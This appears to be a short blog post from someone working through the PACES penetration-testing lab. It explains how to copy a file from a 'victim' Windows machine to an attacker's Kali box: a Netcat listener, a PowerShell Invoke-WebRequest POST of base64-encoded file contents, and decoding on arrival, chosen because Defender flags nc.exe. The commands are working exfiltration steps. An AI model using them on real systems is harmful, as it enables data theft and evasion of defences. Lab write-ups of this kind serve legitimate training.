Powershell - Transfer Files
While busy with the PACES lab, I had to figure out a way to upload files to my attack machine. I couldn’t use tools like Netcat (nc.exe), because Windows Defender now picks this up as a malicious program.
I know of various methods to get files onto a victim machine, but in the past I’ve been able to rely on a limited number of methods to get files from the victim machine.
I came across this interesting usage of Invoke-WebRequest to send files to my attack machine that has Netcat to capture the file.
Attack machine
nc -l -p 443 > file.b64
Victim machine
$b64 = [System.convert]::ToBase64String((Get-Content -Path '.\file.zip' -Encoding Byte));
Invoke-WebRequest -Uri -Method POST -DisableKeepAlive -Timeout 15 -Body $b64;
Attack machine
cat file.b64 | sed -n '8,$'p | base64 -d > file.zip
Setup a file to upload
Let’s setup a test file that we can use to transfer.
Setup Kali to receive file
nc -l -p 443 > file.b64
The Powershell command
First I get the contents of the file into a variable, after encoding it to Base64. This makes the file bigger, but you don’t need to deal with strange encoding issues with Invoke-WebRequest.
$b64 = [System.convert]::ToBase64String((Get-Content -Path '.\file.zip' -Encoding Byte))
Now we are ready to send the content of the file to our listening attacker machine running nc
Invoke-WebRequest -Uri -Method POST -DisableKeepAlive -Timeout 15 -Body $b64
I put the Timeout parameter in, because otherwise the connection just stays open, because nc
never “closes” it.
Original file
Once we have the file, we need to convert the Base64 back into the original encoding, i.e. the zip file.
This command takes the Base64 we received, reads the body part, decodes it and puts the content back into a zip file.
cat file.b64 | sed -n '8,$'p | base64 -d > file.zip